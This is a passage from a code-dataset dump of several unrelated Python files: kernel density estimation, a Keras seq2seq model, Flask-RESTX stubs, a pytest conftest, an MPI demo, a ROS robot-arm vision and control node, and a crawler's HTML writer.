1/(n*h)*np.sum(exp, 0)\n elif self.kernel==\"epanechnikov\":\n k = np.zeros(np.shape(arg))\n k[np.abs(arg)<=1] = 3/4*(1-arg[np.abs(arg)<=1]**2)\n y = 1/(n*h)*np.sum(k, 0)\n else:\n print(\"(applyKernel) Select proper kernel!\")\n y = 0\n return y\n\n def plotDensityEstimation(self, data=None, h=None, plotInterval=[-100, 100], nop=1000, label=None):\n if data is None and self.data is not None:\n data = self.data\n elif data is None and self.data is None:\n print(\"(plotDensityEstimation) No proper data given.\")\n if h is None and self.h is not None:\n h = self.h\n elif h is None and self.h is None:\n print(\"(plotDensityEstimation) No proper bandwidth h is given.\")\n t = np.linspace(plotInterval[0], plotInterval[1], nop)\n f = self.applyKernel(x=t, data=data, h=h)\n if label is None:\n plt.figure()\n plt.plot(t, f)\n plt.title(\"Density estimation for h=\" + str(h))\n else:\n plt.plot(t, f, label=label)\n return t, f\n\n\n def evaluatePointDensity(self, x, h=None, data=None):\n if data is None and self.data is not None:\n data = self.data\n elif data is None and self.data is None:\n print(\"(plotDensityEstimation) No proper data given.\")\n if h is None and self.h is not None:\n h = self.h\n elif h is None and self.h is None:\n print(\"(plotDensityEstimation) No proper bandwidth h is given.\")\n y = self.applyKernel(x, data, h)\n return y\n\nif __name__ == '__main__':\n\n d = data(dim=1, nud=5)\n #d.plotData()\n trD, trL = d.genTrainingData(m=10000)\n teD, teL = d.genTestData(m=10)\n\n kde = kernelDensityEstimator(truncLvl=10, kernel=\"epanechnikov\")\n bw = 0.3\n pI = [-50, 50]\n nop = 10000\n d.plotUD(dim=0, classNr=0, label=\"UD for class 0\", plotInterval=pI, nop=nop)\n kde.plotDensityEstimation(data=trD[trL==-1], h=bw, label=\"kde class 0\", plotInterval=pI, nop=nop)\n kde.plotDensityEstimation(data=trD[trL==1], h=bw, label=\"kde class 1\", plotInterval=pI, nop=nop)\n d.plotUD(dim=0, classNr=1, label=\"UD for class 1\", plotInterval=pI, nop=nop)\n plt.legend()\n plt.show()\n","sub_path":"smolaClass/kernelDensityEstimation.py","file_name":"kernelDensityEstimation.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501076895","text":"# -*- coding: utf-8 -*-\n# @Time :4/2/19 8:49 PM\n# @Auther :Jason Lin\n# @File :test_new.py\n# @Software :PyCharm\nimport motif_encoder_decoder\nimport numpy as np\nfrom keras.layers import Bidirectional, Concatenate, Permute, Dot, Input, LSTM, Multiply, Reshape\nfrom keras.layers import RepeatVector, Dense, Activation, Lambda, Embedding\nimport pickle as pkl\nfrom attention_decoder import AttentionDecoder\nfrom position_embedding import PositionEmbedding\nfrom keras.models import Model\n\n\ndef load_sequence_data(family_name = \"bHLH_Homeo\"):\n if family_name == \"all\":\n seq_info = motif_encoder_decoder.motif_encoder.get_all_dimer()\n fname = seq_info[5]\n else:\n seq_info = motif_encoder_decoder.motif_encoder.get_sequence_family_input(family_name)\n # print(seq_info)\n motif1_seqs = seq_info[2]\n motif2_seqs = seq_info[3]\n dimer_seqs = seq_info[1]\n isRC_flags = seq_info[4]\n\n s_seqs = []\n t_seqs = []\n for i in range(len(dimer_seqs)):\n m = motif_encoder_decoder.motif_encoder(motif1_seq=motif1_seqs[i],\n motif2_seq=motif2_seqs[i], dimer_seq=dimer_seqs[i])\n source_sequence = m.motif_pair_code\n target_sequence = m.dimer_code\n # print(source_sequence.shape)\n # print(target_sequence.shape)\n s_seqs.append(source_sequence)\n t_seqs.append(target_sequence)\n\n s_seqs = np.array(s_seqs)\n t_seqs = np.array(t_seqs)\n # print(s_seqs.shape)\n # print(t_seqs.shape)\n if family_name == \"all\":\n return s_seqs, t_seqs, np.array(fname)\n return s_seqs, t_seqs\n\n\ndef encode_family_label(family_labels):\n import pickle as pkl\n fnames = pkl.load(open(\"./JiecongData/family_labels.pkl\", \"rb\"))\n label_code = []\n for l in family_labels:\n code = np.zeros(len(fnames))\n code[fnames == l] = 1\n label_code.append(code)\n label_code = np.array(label_code)\n return label_code\n\ndef seq2seq_model():\n Tx = 18 + 18 # Source sequence max length\n Ty = 31 + 2 # Target sequence max length\n source_dim = 4\n target_dim = 6\n\n source_seq = Input(shape=(Tx, source_dim))\n target_seq = Input(shape=(Ty, target_dim))\n\n\n encoder_output = Bidirectional(LSTM(32, return_sequences=True))(source_seq)\n print(encoder_output)\n bahdanau_attention_decoder = AttentionDecoder(50, Ty)\n decoder_output = bahdanau_attention_decoder([encoder_output, target_seq])\n model = Model(inputs=[source_seq, target_seq], outputs=[decoder_output])\n\n model.compile(\n loss='categorical_crossentropy',\n optimizer='adadelta')\n\n return model\n\n\ndef training_test():\n from sklearn.model_selection import KFold\n source_seqs, target_seqs, fnames = load_sequence_data(family_name=\"all\")\n kf = KFold(n_splits=10, random_state=66, shuffle=True)\n fold_dict = dict()\n fold_info_dict = dict()\n fold_id = 0\n family_labels = encode_family_label(fnames)\n\n\n\n for train_index, test_index in kf.split(source_seqs):\n print(\"-\" * 10, fold_id, \"-\" * 10)\n res_dist = []\n s_train = source_seqs[train_index]\n t_train = target_seqs[train_index]\n s_test = source_seqs[test_index]\n t_test = target_seqs[test_index]\n t_fname = fnames[test_index]\n\n model = seq2seq_model()\n model.fit([s_train, t_train], t_train, epochs=5)\n # fam_train = family_labels[train_index]\n # fam_test = family_labels[test_index]\n\ntraining_test()","sub_path":"test_new.py","file_name":"test_new.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"10281444","text":"##############server_path.py##############\r\n\r\nimport time\r\nimport logging\r\nimport argsparser\r\nfrom flask_restx import *\r\nfrom flask import *\r\n\r\nns = Namespace(\r\n\t'my_space', \r\n\tdescription='machine learning as a service',\r\n\t)\r\n\r\nargs = argsparser.prepare_args()\r\n\r\n#############\r\n\r\nchunking_parser = ns.parser()\r\nchunking_parser.add_argument('text', type=str, location='json')\r\n\r\nchunking_inputs = ns.model(\r\n\t'my_space', \r\n\t\t{\r\n\t\t\t'text': fields.String(example = u\"this is an input text\")\r\n\t\t}\r\n\t)\r\n\r\n@ns.route('/chunking')\r\nclass chunking_api(Resource):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper(chunking_api, self).__init__(*args, **kwargs)\r\n\t@ns.expect(chunking_inputs)\r\n\tdef post(self):\t\t\r\n\t\tstart = time.time()\r\n\t\ttry:\t\t\t\r\n\t\t\targs = chunking_parser.parse_args()\t\t\r\n\t\t\toutput = {}\r\n\t\t\toutput['chunks'] = [\r\n\t\t\t\t'chunck1', \r\n\t\t\t\t'chunck2',\r\n\t\t\t]\r\n\t\t\toutput['status'] = 'success'\r\n\t\t\toutput['running_time'] = float(time.time()- start)\r\n\t\t\treturn output, 200\r\n\t\texcept Exception as e:\r\n\t\t\toutput = {}\r\n\t\t\toutput['status'] = str(e)\r\n\t\t\toutput['running_time'] = float(time.time()- start)\r\n\t\t\treturn output\r\n\r\n#############\r\n\r\nextraction_parser = ns.parser()\r\nextraction_parser.add_argument('chunk', type=str, location='json')\r\n\r\nextraction_inputs = ns.model(\r\n\t'my_space', \r\n\t\t{\r\n\t\t\t'chunk': fields.String(example = u\"this is a chunk\")\r\n\t\t}\r\n\t)\r\n\r\n@ns.route('/extraction')\r\nclass extraction_api(Resource):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper(extraction_api, self).__init__(*args, **kwargs)\r\n\t@ns.expect(extraction_inputs)\r\n\tdef post(self):\t\t\r\n\t\tstart = time.time()\r\n\t\ttry:\t\t\t\r\n\t\t\targs = extraction_parser.parse_args()\t\t\r\n\t\t\toutput = {}\r\n\t\t\toutput['entities'] = [\r\n\t\t\t\t{'text':'entity1','score':0.97},\r\n\t\t\t\t{'text':'entity2','score':0.91},\r\n\t\t\t]\r\n\t\t\toutput['status'] = 'success'\r\n\t\t\toutput['running_time'] = float(time.time()- start)\r\n\t\t\treturn output, 200\r\n\t\texcept Exception as e:\r\n\t\t\toutput = {}\r\n\t\t\toutput['status'] = str(e)\r\n\t\t\toutput['running_time'] = float(time.time()- start)\r\n\t\t\treturn output\r\n\r\n##############server_path.py##############","sub_path":"server_path.py","file_name":"server_path.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"574919406","text":"#\n# Copyright (c) 2018 Netapp pvt ltd - All Rights Reserved\n#\n# Unauthorized copying of this file, via any medium is strictly prohibited\n# Proprietary and confidential\n#\n# This file is part of cbsTAS project\n#\n# Author: Gayathri Lokesh \n#\n\n# python imports\nimport os\nimport sys\nimport time\nfrom colors import blue\n\n# pytest imports\nimport pytest\nfrom _pytest.terminal import TerminalReporter\n#from _pytest.config import get_config\nfrom pluggy import HookspecMarker\nhookspec = HookspecMarker(\"pytest\")\n\n# cbsTAS imports\nfrom cbstas.cbstas_fw.core.cbstas_logger import get_logger, get_mod_logger, get_run_id, get_out_dir\nfrom cbstas.cbstas_fw.core.cbstas_init import gen_run_id, cbstas_fw_init\nfrom cbstas.cbstas_fw.core.testbed import get_all_duts_info\n\nlog = get_logger(__name__)\n\ndef pytest_addoption(parser):\n parser.addoption(\n '--basedir',\n action='store',\n dest='basedir',\n help='Base cbstas repo path')\n parser.addoption(\n '--testbed',\n action='store',\n dest='testbed',\n help='Testbed path - yml ')\n parser.addoption(\n '--outdir',\n action='store',\n dest='outdir',\n help='Dir for saving test run-logs of all types')\n\n\ndef pytest_configure(config):\n sys.path.append(config.option.basedir)\n from cbstas.cbstas_fw.cbstas_gdata import config as cfg\n global cfg\n config.option.importmode = 'append'\n config.option.self_contained_html = 'True'\n run_id = gen_run_id()\n if config.option.outdir != None:\n cfg._cfg_out_dir = config.option.outdir + '/RUN_' + run_id\n os.mkdir(cfg._cfg_out_dir)\n\n config.option.htmlpath = cfg._cfg_out_dir + '/run.html'\n config.option.xmlpath = cfg._cfg_out_dir + '/run.xml'\n config.option.log_file = cfg._cfg_out_dir + '/run.log'\n #config.option.confcutdir = config.option.basedir + '/cbstas/conftest.py'\n config.option.log_format = '[%(asctime)s], %(levelname)s, %(filename)s, %(funcName)s, %(lineno)d :: %(message)s'\n config.option.log_level = 'INFO'\n config.option.log_date_format = '%Y-%m-%d %H:%M:%S'\n config.option.log_file_format = '[%(asctime)s], %(levelname)s, %(filename)s, %(funcName)s, %(lineno)d :: %(message)s'\n config.option.log_file_level = 'DEBUG'\n config.option.log_file_date_format = '%Y-%m-%d %H:%M:%S'\n config.option.log_cli = True\n config.option.log_cli_format = '[%(asctime)s], %(levelname)s, %(filename)s, %(funcName)s, %(lineno)d :: %(message)s'\n# config.option.log_cli_level = 'DEBUG'\n# config.option.log_cli_level = 'INFO'\n config.option.log_cli_date_format = '%Y-%m-%d %H:%M:%S'\n\n\ndef pytest_report_header(config):\n st = '\\n===> LOG DIR : {0} \\n'.format(config.option.log_file)\n st += '===> HTML DIR : {0} \\n'.format(config.option.htmlpath)\n st += '===> XML DIR : {0} \\n'.format(config.option.xmlpath)\n return blue(st)\n\n\ndef pytest_runtest_setup(item):\n cfg._cfg_module = item.module.__name__\n mod_log = get_mod_logger(cfg._cfg_module)\n mod_log.info('{0}'.format('=' * 80))\n msg = 'STARTED : {0} '.format(item.name)\n mod_log.info('{0}'.format(msg.center(75, ' ')))\n mod_log.info('{0}'.format('=' * 80))\n\ndef pytest_unconfigure(config):\n \"\"\" called before test process is exited.\"\"\"\n if config.option.log_file:\n TerminalReporter(config).write('\\n')\n TerminalReporter(config).write_sep(\n '-', 'generated log file: ' + config.option.log_file)\n TerminalReporter(config).write('\\n\\n')\n\n@hookspec(firstresult=True)\ndef pytest_report_teststatus(report):\n \"\"\" return result-category, shortletter and verbose word for reporting.\n Stops at first non-None result, see :ref:`firstresult` \"\"\"\n report.toterminal\n\n\ndef pytest_terminal_summary(terminalreporter, exitstatus):\n \"\"\"Add a section to terminal summary reporting. TBD \"\"\"\n pass\n\n@pytest.fixture(scope='session')\ndef pre_test(request):\n \"\"\"\n Session/RUNID level configs/setup\n \"\"\"\n log.info('Executing Pre-test ')\n log.info('Initialize framework!!')\n\n input_dict = {}\n input_dict['iniconfig'] = request.config.option\n input_dict['dut_info'] = get_all_duts_info()\n input_dict['outdir'] = get_out_dir()\n input_dict['run_id'] = get_run_id()\n input_dict['basetemp'] = request.config.option.basedir\n input_dict['tb_path'] = request.config.option.testbed\n input_dict['user_lib'] = input_dict['basetemp'] + '/cbstas/userlib/'\n\n cbstas_fw_init(**input_dict)\n\n def post_test():\n \"\"\"\n Session level deconfig/cleanup/teardown\n \"\"\"\n log.info('Executing Post test')\n\n request.addfinalizer(post_test)\n","sub_path":"cbstas/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"417814179","text":"from mpi4py import MPI\nfrom Client import Client\nfrom Producer import Producer\nfrom collections import deque\nimport time\nimport random\n\n\nif __name__ == '__main__':\n\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n size = comm.Get_size()\n time.sleep(1)\n\n if rank % 2 == 0:\n prod = Producer()\n for _ in range(6):\n prod.produce(1)\n prod.kill()\n else:\n cli = Client()\n for _ in range(6):\n cli.consume()\n cli.kill()\n \n print(\"loop ended\\n\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143322681","text":"#!/usr/bin/env python\n\nimport roslib\nimport sys\nimport rospy\nimport cv2\nimport numpy as np\nfrom math import cos\nfrom math import sin\nimport math\nfrom scipy.optimize import least_squares, minimize\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Float64MultiArray, Float64\nfrom cv_bridge import CvBridge, CvBridgeError\n\n\nclass image_converter:\n\n # Defines publisher and subscriber\n def __init__(self):\n # initialize the node named image_processing\n rospy.init_node('image_processing', anonymous=True)\n # initialize a publisher to send images from camera2 to a topic named image_topic2\n self.image_pub2 = rospy.Publisher(\"image_topic2\",Image, queue_size = 1)\n # initialize a subscriber to recieve messages rom a topic named /robot/camera1/image_raw and use callback function to recieve data\n self.image_sub2 = rospy.Subscriber(\"/camera2/robot/image_raw\",Image,self.callback2)\n # initialize the bridge between openCV and ROS\n self.bridge = CvBridge()\n self.targetPrevious = [0.0, 0.0]\n self.centersYZ = []\n self.centers_YZ = rospy.Subscriber(\"centers_calculated\", Float64MultiArray, self.callbackProcessSub)\n self.centers3D = rospy.Publisher(\"centers_3D\", Float64MultiArray, queue_size = 10)\n self.joint_angles = rospy.Publisher(\"joint_angles\", Float64MultiArray, queue_size=10)\n\n self.yellowHistory = np.array([0, 0])\n self.blueHistory = np.array([0, 0])\n self.greenHistory = np.array([0, 0])\n self.redHistory = np.array([0, 0])\n\n self.joint1_curr = 0.0\n self.joint2_curr = 0.0\n self.joint3_curr = 0.0\n self.joint4_curr = 0.0\n\n self.target_pub = rospy.Publisher(\"target_pub\", Float64MultiArray, queue_size=10)\n self.end_eff_pub = rospy.Publisher(\"end_eff_pub\", Float64MultiArray, queue_size=10)\n\n self.controller_acc = rospy.Publisher(\"controller_acc\", Float64, queue_size=10)\n self.j_rank = rospy.Publisher(\"j_rank\", Float64, queue_size=10)\n\n self.joint1_sub = rospy.Subscriber(\"/robot/joint1_position_controller/command\",Float64,self.getJointAngle1Temp)\n self.joint2_sub = rospy.Subscriber(\"/robot/joint2_position_controller/command\",Float64,self.getJointAngle2Temp)\n self.joint3_sub = rospy.Subscriber(\"/robot/joint3_position_controller/command\",Float64,self.getJointAngle3Temp)\n self.joint4_sub = rospy.Subscriber(\"/robot/joint4_position_controller/command\",Float64,self.getJointAngle4Temp)\n\n self.firstRun = True\n\n # For robot closed control\n self.time_previous_step = np.array([rospy.get_time()], dtype='float64')\n self.error = np.array([0.0, 0.0, 0.0], dtype='float64')\n self.error_d = np.array([0.0, 0.0, 0.0], dtype='float64')\n\n self.robot_joint1_pub = rospy.Publisher(\"/robot/joint1_position_controller/command\", Float64, queue_size=10)\n self.robot_joint2_pub = rospy.Publisher(\"/robot/joint2_position_controller/command\", Float64, queue_size=10)\n self.robot_joint3_pub = rospy.Publisher(\"/robot/joint3_position_controller/command\", Float64, queue_size=10)\n self.robot_joint4_pub = rospy.Publisher(\"/robot/joint4_position_controller/command\", Float64, queue_size=10)\n\n def getJointAngle1Temp(self, data):\n self.joint1_curr = data.data\n\n def getJointAngle2Temp(self, data):\n self.joint2_curr = data.data\n\n def getJointAngle3Temp(self, data):\n self.joint3_curr = data.data\n\n def getJointAngle4Temp(self, data):\n self.joint4_curr = data.data\n\n def setJointAnglesInit(self, isFirstRun):\n if (isFirstRun):\n self.firstRun=False\n\n self.joint1 = Float64()\n self.joint1.data = 0.0\n self.joint2 = Float64()\n self.joint2.data = 0.0\n self.joint3 = Float64()\n self.joint3.data = 0.0\n self.joint4 = Float64()\n self.joint4.data = 0.0\n self.robot_joint1_pub.publish(self.joint1)\n self.robot_joint2_pub.publish(self.joint2)\n self.robot_joint3_pub.publish(self.joint3)\n self.robot_joint4_pub.publish(self.joint4)\n\n def callbackProcessSub(self, data):\n subscriberData = np.array(data.data)\n self.centersYZ = subscriberData[0:10]\n\n # Detecting the centre of the red circle\n def detect_red(self, image):\n # Isolate the blue colour in the image as a binary image\n mask = cv2.inRange(image, (0, 0, 100), (0, 0, 255))\n # This applies a dilate that makes the binary region larger (the more iterations the larger it becomes)\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.dilate(mask, kernel, iterations=3)\n # Obtain the moments of the binary image\n M = cv2.moments(mask)\n # Calculate pixel coordinates for the centre of the blob\n if (M['m00'] == 0):\n return self.redHistory\n\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n self.redHistory = np.array([cx, cy])\n return self.redHistory\n\n # Detecting the centre of the green circle\n def detect_green(self, image):\n mask = cv2.inRange(image, (0, 100, 0), (0, 255, 0))\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.dilate(mask, kernel, iterations=3)\n M = cv2.moments(mask)\n\n if (M['m00'] == 0):\n return self.greenHistory\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n self.greenHistory = np.array([cx, cy])\n return self.greenHistory\n\n # Detecting the centre of the blue circle\n def detect_blue(self, image):\n mask = cv2.inRange(image, (100, 0, 0), (255, 0, 0))\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.dilate(mask, kernel, iterations=3)\n M = cv2.moments(mask)\n if (M['m00'] == 0):\n return self.blueHistory\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n self.blueHistory = np.array([cx, cy])\n return self.blueHistory\n\n # Detecting the centre of the yellow circle\n def detect_yellow(self, image):\n mask = cv2.inRange(image, (0, 100, 100), (0, 255, 255))\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.dilate(mask, kernel, iterations=3)\n M = cv2.moments(mask)\n if (M['m00'] == 0):\n return self.yellowHistory\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n self.yellowHistory = np.array([cx, cy])\n return self.yellowHistory\n\n # Detecting the centre of the target\n def detect_target(self, image, target_previous):\n a = self.pixel2meter(image)\n mask = cv2.inRange(image, (40, 100, 120), (100, 185, 220))\n im2 = cv2.imshow('window2', mask)\n cv2.waitKey(1)\n contours, hierarchy = cv2.findContours(mask, 1, 2)\n contoursSorted = []\n\n for cnt in contours:\n epsilon = 0.001 * cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, epsilon, True)\n\n if (len(approx) > 6):\n contoursSorted.append([cnt, len(approx)])\n\n if (len(contoursSorted) > 0):\n sortedContours = sorted(contoursSorted, key=lambda tup: tup[1], reverse=True)\n cnt = sortedContours[0][0]\n M = cv2.moments(cnt)\n if (M['m00'] == 0):\n return target_previous\n\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n cv2.drawContours(image, [cnt], -1, (0, 255, 0), 1)\n cv2.circle(image, (cx, cy), 1, (255, 255, 255), -1)\n cv2.imshow(\"Image\", image)\n cv2.imwrite('image11.png', image)\n cv2.waitKey(1)\n\n posRelative = np.array([(cx - self.detect_yellow(image)[0]), (self.detect_yellow(image)[1] - cy)])\n target_previous[0] = (a * posRelative[0])\n target_previous[1] = (a * posRelative[1])\n\n return (target_previous)\n\n # Calculate the conversion from pixel to meter\n def pixel2meter(self, image):\n # Obtain the centre of each coloured blob\n circle1Pos = self.detect_yellow(image)\n circle2Pos = self.detect_blue(image)\n # find the distance between two circles\n dist = np.sum((circle1Pos - circle2Pos) ** 2)\n return 2 / np.sqrt(dist)\n\n def convertCenters3D(self, image, target_previous):\n a = self.pixel2meter(image)\n yellowXZ = self.detect_yellow(image)\n blueXZ = self.detect_blue(image)\n greenXZ = self.detect_green(image)\n redXZ = self.detect_red(image)\n targetXZ = self.detect_target(image, target_previous)\n\n yellowCenter = np.array([0, 0, 0])\n blueCenter = a * np.array([(blueXZ[0] - yellowXZ[0]), (self.centersYZ[2] - self.centersYZ[0]), (yellowXZ[1] - blueXZ[1])])\n greenCenter = a * np.array([(greenXZ[0] - yellowXZ[0]), (self.centersYZ[4] - self.centersYZ[0]), (yellowXZ[1] - greenXZ[1])])\n redCenter = a * np.array([(redXZ[0] - yellowXZ[0]), (self.centersYZ[6] - self.centersYZ[0]), (yellowXZ[1] - redXZ[1])])\n targetCenter = np.array([targetXZ[0], self.centersYZ[8], targetXZ[1]])\n return np.array([yellowCenter, blueCenter, greenCenter, redCenter, targetCenter])\n\n def errorFunction(self, theta, coordinatesFound):\n q1 = theta[0]\n q2 = theta[1]\n q3 = theta[2]\n q4 = theta[3]\n\n c1 = math.cos(q1 + math.pi / 2)\n c2 = math.cos(q2 + math.pi / 2)\n c3 = math.cos(q3)\n c4 = math.cos(q4)\n\n s1 = math.sin(q1 + math.pi / 2)\n s2 = math.sin(q2 + math.pi / 2)\n s3 = math.sin(q3)\n s4 = math.sin(q4)\n\n transformation_03 = np.array([[3*s1*s3 + 3*c1*c2*c3], [3*c2*c3*s1 - 3*c1*s3], [3*c3*s2 + 2]])\n transformation_04 = np.array([[3*s1*s3 + 2*c4*(s1*s3 + c1*c2*c3) + 3*c1*c2*c3 - 2*c1*s2*s4], [3*c2*c3*s1 - 2*c4*(c1*s3 - c2*c3*s1) - 3*c1*s3 - 2*s1*s2*s4], [3*c3*s2 + 2*c2*s4 + 2*c3*c4*s2 + 2]])\n\n red_coords = np.array([[coordinatesFound[9], coordinatesFound[10], coordinatesFound[11]]])\n green_coords = np.array([[coordinatesFound[6], coordinatesFound[7], coordinatesFound[8]]])\n blue_coords = np.array([[coordinatesFound[3], coordinatesFound[4], coordinatesFound[5]]])\n\n return np.sum(((transformation_03 - green_coords)) + ((transformation_04 - red_coords)) + (([0,0,2] - blue_coords)))\n\n def detect_joint_angles(self, _):\n return np.array([self.joint1_curr,self.joint2_curr,self.joint3_curr,self.joint4_curr])\n\n def detect_joint_anglesX(self, coordinatesFound):\n solution = least_squares(self.errorFunction, x0=[0, 0, 0, 0], args = [coordinatesFound], bounds=(0,1))\n if(solution.success == False):\n print(\"Joint Angles not found\")\n return solution.x\n\n def forward_kinematics(self, joint_angles):\n q1 = joint_angles[0]\n q2 = joint_angles[1]\n q3 = joint_angles[2]\n q4 = joint_angles[3]\n\n c1 = math.cos(q1 + math.pi / 2)\n c2 = math.cos(q2 + math.pi / 2)\n c3 = math.cos(q3)\n c4 = math.cos(q4)\n\n s1 = math.sin(q1 + math.pi / 2)\n s2 = math.sin(q2 + math.pi / 2)\n s3 = math.sin(q3)\n s4 = math.sin(q4)\n\n return np.array([[3*s1*s3 + 2*c4*(s1*s3 + c1*c2*c3) + 3*c1*c2*c3 - 2*c1*s2*s4], [3*c2*c3*s1 - 2*c4*(c1*s3 - c2*c3*s1) - 3*c1*s3 - 2*s1*s2*s4], [ 3*c3*s2 + 2*c2*s4 + 2*c3*c4*s2 + 2]])\n\n def calculate_jacobian(self, joint_angles):\n q1 = joint_angles[0]\n q2 = joint_angles[1]\n q3 = joint_angles[2]\n q4 = joint_angles[3]\n\n c1 = math.cos(q1 + math.pi / 2)\n c2 = math.cos(q2 + math.pi / 2)\n c3 = math.cos(q3)\n c4 = math.cos(q4)\n\n s1 = math.sin(q1 + math.pi / 2)\n s2 = math.sin(q2 + math.pi / 2)\n s3 = math.sin(q3)\n s4 = math.sin(q4)\n\n dk1 = np.array([((2 * s2 * s4 - 2 * c2 * c3 * c4 - 3 * c2 * c3) * s1 + (2 * s3 * c4 + 3 * s3) * c1),\n (-1 * c1 * ((2 * c3 * c4 + 3 * c3) * s2 + 2 * s4 * c2)),\n (-1 * (2 * c4 + 3) * (c1 * c2 * s3 - s1 * c3)),\n (-2 * ((s1 * s3 + c1 * c2 * c3) * s4 + c1 * s2 * c4))])\n dk2 = np.array([((2 * s3 * c4 + 3 * s3) * s1 + (-2 * s2 * s4 + 2 * c2 * c3 * c4 + 3 * c2 * c3) * c1),\n (-1 * s1 * ((2 * c3 * c4 + 3 * c3) * s2 + 2 * s4 * c2)),\n (-1 * (2 * c4 + 3) * (s1 * c2 * s3 + c1 * c3)),\n (2 * ((c1 * s3 - s1 * c2 * c3) * s4 - s1 * s2 * c4))])\n dk3 = np.array([(0), ((2 * c3 * c4 + 3 * c3) * c2 - 2 * s4 * s2), (-1 * s2 * (2 * c4 + 3) * s3),\n (-2 * (s2 * c3 * s4 - c2 * c4))])\n\n jacobian = np.array([dk1, dk2, dk3])\n self.jacobian_rank = np.linalg.matrix_rank(jacobian)\n\n return np.array([dk1, dk2, dk3])\n\n def control_closed(self):\n # Proportional gain\n K_p = np.array([[0.15, 0, 0], [0, 0.15, 0], [0, 0, 0.15]])\n # Derivative gain\n K_d = np.array([[0.2, 0, 0], [0, 0.2, 0], [0, 0, 0.2]])\n # Time step estimate\n cur_time = np.array([rospy.get_time()])\n dt = cur_time - self.time_previous_step\n self.time_previous_step = cur_time\n # Robot end-effector position\n end_eff_pos = self.coordS[9:12]\n # Target position\n target_pos = self.coordS[12:15]\n self.error_g = ((target_pos - end_eff_pos) - self.error) / dt\n # Error Estimation\n self.error = target_pos - end_eff_pos\n config_state = self.detect_joint_angles(self.coordS)\n Jac_inv = np.linalg.pinv(self.calculate_jacobian(config_state)) # (psudeo inverse)\n contr_inp = np.dot(Jac_inv, (np.dot(K_d, self.error_g.transpose()) + np.dot(K_p, self.error.transpose())))\n ang_posi = config_state + (dt * contr_inp)\n return ang_posi\n\n # Recieve data, process it, and publish\n def callback2(self,data):\n # Recieve the image\n try:\n self.cv_image2 = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n\n im2=cv2.imshow('window2', self.cv_image2)\n cv2.waitKey(1)\n\n self.coordS = self.convertCenters3D(self.cv_image2, self.targetPrevious).flatten()\n targetCenter = Float64MultiArray()\n targetCenter.data = self.coordS\n\n self.setJointAnglesInit(self.firstRun)\n\n\n jointAngles = Float64MultiArray()\n jointAngles.data = self.detect_joint_anglesX(self.coordS)\n\n jointAnglesActual = Float64MultiArray()\n jointAnglesActual.data = self.detect_joint_angles(self.coordS)\n\n end_eff_coords = Float64MultiArray()\n end_eff_coords.data = self.coordS[9:12]\n\n target_coords = Float64MultiArray()\n target_coords.data = self.coordS[12:15]\n\n acc = Float64()\n acc.data = np.sum(np.abs(np.subtract(self.coordS[9:12], self.coordS[12:15])))\n\n\n q_d = self.control_closed()\n self.joint1 = Float64()\n self.joint1.data = q_d[0]\n self.joint2 = Float64()\n self.joint2.data = q_d[1]\n self.joint3 = Float64()\n self.joint3.data = q_d[2]\n self.joint4 = Float64()\n self.joint4.data = q_d[3]\n\n jac_rank = Float64()\n jac_rank.data = self.jacobian_rank\n\n # Publish the results\n try:\n self.image_pub2.publish(self.bridge.cv2_to_imgmsg(self.cv_image2, \"bgr8\"))\n self.joint_angles.publish(jointAngles)\n\n self.centers3D.publish(targetCenter)\n\n self.robot_joint1_pub.publish(self.joint1)\n self.robot_joint2_pub.publish(self.joint2)\n self.robot_joint3_pub.publish(self.joint3)\n self.robot_joint4_pub.publish(self.joint4)\n\n self.end_eff_pub.publish(end_eff_coords)\n self.target_pub.publish(target_coords)\n self.controller_acc.publish(acc)\n self.j_rank.publish(jac_rank)\n\n except CvBridgeError as e:\n print(e)\n\n# call the class\ndef main(args):\n ic = image_converter()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\n# run the code if the node is called\nif __name__ == '__main__':\n main(sys.argv)\n\n\n","sub_path":"src/image2.py","file_name":"image2.py","file_ext":"py","file_size_in_byte":15071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"486937369","text":"class HtmlOutputer:\n def __init__(self):\n self.datas = []\n\n def collect_data(self, data): # 收集爬取到的数据\n if data is None:\n return\n self.datas.append(data)\n\n def output_html(self): # 将爬取到的数据写到本地\n with open('log/output.html', 'w', encoding='utf-8') as f:\n f.write(\"\")\n f.write(\" \")\n f.write(\"\")\n f.write(\"\")\n\n count = 1\n print('datas-->',self.datas)\n for data in self.datas:\n print('data-->', data)\n f.write(\"\")\n # f.write(\"\" % str(data['url'].encode('utf-8'), 'utf-8'))\n # f.write(\"\" % str(data['title'].encode('utf-8'), 'utf-8'))\n # f.write(\"\" % str(data['summary'].encode('utf-8'), 'utf-8'))\n f.write(\"

